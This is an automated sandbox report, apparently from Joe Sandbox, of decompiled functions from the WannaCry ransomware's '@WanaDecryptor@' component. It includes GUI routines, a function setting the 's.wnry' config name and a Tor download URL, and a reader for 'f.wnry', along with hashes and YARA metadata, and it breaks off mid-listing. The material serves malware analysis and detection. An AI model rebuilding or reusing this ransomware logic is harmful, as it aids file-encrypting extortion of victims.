Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #823#825ExecuteMessageSendShell
String ID: open
API String ID: 1093558810-2758837156
Opcode ID: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
Opcode Fuzzy Hash: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}

0x004030e0
0x004030e2
0x004030ed
0x004030ee
0x004030f5
0x004030ff
0x00403100
0x00403105
0x00403109
0x00403115
0x00403119
0x0040311e
0x0040312a
0x00403131
0x0040313a
0x00403140
0x00403146
0x00403150
0x00403156
0x00403160
0x00403166
0x00403171
0x0040317b

APIs

#324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
#567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
#567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131

Strings

0ZA, xrefs: 00403156
DZA, xrefs: 00403146

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #567$#324
String ID: 0ZA$DZA
API String ID: 784016053-3838179817
Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}

0x00404c40
0x00404c42
0x00404c4d
0x00404c4e
0x00404c55
0x00404c5e
0x00404c5f
0x00404c64
0x00404c68
0x00404c70
0x00404c7a
0x00404c7f
0x00404c86
0x00404c8d
0x00404c94
0x00404c9b
0x00404ca2
0x00404ca7
0x00404cad
0x00404cba
0x00404cc4

APIs

#324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
#540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
#860.MFC42(00421798), ref: 00404CAD

Strings

0ZA, xrefs: 00404C94
DZA, xrefs: 00404C86

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #324#540#860
String ID: 0ZA$DZA
API String ID: 1048258301-3838179817
Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

0x00408b40
0x00408b42
0x00408b4d
0x00408b4e
0x00408b5a
0x00408b5d
0x00408b61
0x00408b67
0x00408b6a
0x00408b6e
0x00408b76
0x00408bd0
0x00408bd3
0x00408b78
0x00408b78
0x00408b7e
0x00408b84
0x00408b8b
0x00408b8d
0x00408b92
0x00408b94
0x00408b94
0x00408ba7
0x00408bad
0x00408bb3
0x00408bc1
0x00408bc7
0x00408bc8
0x00408bc9
0x00408bb5
0x00408bb8
0x00408bb9
0x00408bba
0x00408bba
0x00408bb3
0x00408bd6
0x00408bd9
0x00408bdd
0x00408be5
0x00408bea
0x00408bf1
0x00408bf7
0x00408bff
0x00408c0b
0x00408c15

APIs

BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
#5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
#5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
#2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
#640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5785$#2414#640
String ID:
API String ID: 2719443296-0
Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65

Uniqueness

Uniqueness Score: -1.00%

Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}

0x00404536
0x00404538
0x0040453d
0x0040453e
0x0040454b
0x00404550
0x00404552
0x00404557
0x0040455a
0x0040455f
0x00404564
0x0040456b
0x0040456c
0x00404574
0x0040458d
0x0040459b
0x0040459e
0x004045a3
0x004045a6
0x004045af
0x004045b3
0x004045bb
0x004045c0
0x00404557
0x004045c6
0x004045d0

APIs

#289.MFC42 ref: 0040455F
#5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
#5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
#613.MFC42 ref: 004045BB

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#289#613ExtentPoint32Text
String ID:
API String ID: 888490064-0
Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}

0x00406cf6
0x00406cf8
0x00406cfd
0x00406cfe
0x00406d09
0x00406d0c
0x00406d14
0x00406d16
0x00406d16
0x00406d2c
0x00406d32
0x00406d34
0x00406d39
0x00406d55
0x00406d5d
0x00406d61
0x00406d69
0x00406d6f
0x00406d76
0x00406d7f
0x00406d87
0x00406d92
0x00406d9c

APIs

SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
#353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,755720C0), ref: 00406D39
SendMessageA.USER32 ref: 00406D69
#1979.MFC42 ref: 00406D6F
#665.MFC42 ref: 00406D87

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#1979#353#665
String ID:
API String ID: 3794212480-0
Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}

0x00407dbe
0x00407dd2
0x00407dd7
0x00407ddf
0x00407dea
0x00407dec
0x00407df2
0x00407dfc
0x00407dfe
0x00407dfe
0x00407e0d
0x00407e18
0x00407e1d
0x00407e26
0x00407e2a
0x00407e2c
0x00407e2f
0x00407e2f
0x00407e34
0x00407e3e
0x00407e49
0x00407e52
0x00407e5d
0x00407e6a
0x00407e77

APIs

Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039

time.MSVCRT ref: 00407DEA
#2514.MFC42 ref: 00407E18
time.MSVCRT ref: 00407E2A
#765.MFC42 ref: 00407E49
#641.MFC42 ref: 00407E5D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: time$#2514#324#567#641#765
String ID:
API String ID: 3372871541-0
Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}

0x004031a0
0x004031a2
0x004031a7
0x004031ad
0x004031ae
0x004031bc
0x004031c0
0x004031c8
0x004031ce
0x004031d2
0x004031da
0x004031df
0x004031e4
0x004031ea
0x004031f0
0x004031f4
0x004031fc
0x00403201
0x0040320c
0x00403212
0x00403217
0x0040321f
0x00403224
0x0040322b
0x00403233
0x0040323e
0x00403248

APIs

#2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
#2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
#616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
#693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
#641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#616#641#693
String ID:
API String ID: 1164084425-0
Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE90 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BE90(char* _a4, char* _a8, char* _a12) {

				strncpy("s.wnry", _a4, 0x63);
				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
				strncpy(0x4221ac, _a12, 0x63);
				return 0;
			}

0x0040be9c
0x0040bead
0x0040bebe
0x0040bec8

APIs

strncpy.MSVCRT ref: 0040BE9C
strncpy.MSVCRT ref: 0040BEAD
strncpy.MSVCRT ref: 0040BEBE

Strings

https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
s.wnry, xrefs: 0040BE97

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: strncpy
String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
API String ID: 3301158039-3000313716
Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A

Uniqueness

Uniqueness Score: -1.00%

Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}

0x00403af6
0x00403af8
0x00403afd
0x00403afe
0x00403b1d
0x00403b21
0x00403b26
0x00403b48
0x00403b5b
0x00403b62
0x00403b67
0x00403b69
0x00403b9b
0x00403b9e
0x00403ba2
0x00403ba4
0x00403bb2
0x00403bbd
0x00403bc1
0x00403bc3
0x00403bc5
0x00403bd1
0x00403bd3
0x00403bd6
0x00403bd8
0x00000000
0x00000000
0x00403be7
0x00403beb
0x00403beb
0x00403bec
0x00403bee
0x00403bf7
0x00403bfb
0x00403bfc
0x00403c01
0x00000000
0x00000000
0x00403c03
0x00403c0c
0x00403c10
0x00403c11
0x00403c16
0x00000000
0x00000000
0x00403c35
0x00403c39
0x00403c3a
0x00403c48
0x00403c4d
0x00403c4f
0x00403c51
0x00403c51
0x00403c51
0x00403c51
0x00403c4f
0x00000000
0x00403c18
0x00403c21
0x00403c25
0x00403c26
0x00403bf7
0x00403bfb
0x00403bfc
